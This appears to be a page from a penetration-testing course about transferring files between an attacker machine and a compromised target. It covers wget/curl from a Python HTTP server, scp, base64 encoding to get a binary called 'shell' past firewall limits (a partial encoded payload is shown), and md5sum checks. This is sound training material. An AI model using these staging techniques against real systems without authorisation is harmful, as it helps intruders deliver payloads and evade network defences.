Downloading files from Target

Different ways to download files from Target Machine.

WGET

Python HTTP Server

Start a python server on the host machine

cd /tmp

python3 -m http.server 8000

Download file from target:

wget http://[HOST_IP]:8000/[file]

You can also use cURL:

curl http://[HOST_IP]:8000/[file] -o [new_file-name]

SCP

This assumes we have ssh access to the target machine

scp [file] [USERNAME]@[TARGET_IP]:/tmp/[new_file_name]

File will be downloaded to the /tmp directory

Base64

In some cases, we may not be able to transfer the file. For example, the remote host may have firewall protections that prevent us from downloading a file from our machine. In this type of situation, we can use a simple trick to base64 encode the file into base64 format, and then we can paste the base64 string on the remote server and decode it. For example, if we wanted to transfer a binary file called shell, we can base64 encode it as follows:

base64 shell -w 0

Now, we can copy this base64 string, go to the remote host, and use base64 -d to decode it, and pipe the output into a file:

echo f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAA... <SNIP> ...lIuy9iaW4vc2gAU0iJ51JXSInmDwU | base64 -d > shell

Validating File Transfer

Sometimes we need to validate the file transfer. We can utilize the file command and md5sum command to do this.

File

file shell

Confirm file type

MD5SUM

On host machine:

md5sum shell

On Target Machine

md5sum shell

Compare output from both and make sure they match. If not, then something went wrong in the transfer or encode/decode process.

PreviousEscalation NextKnowledge Check

Last updated 2 years ago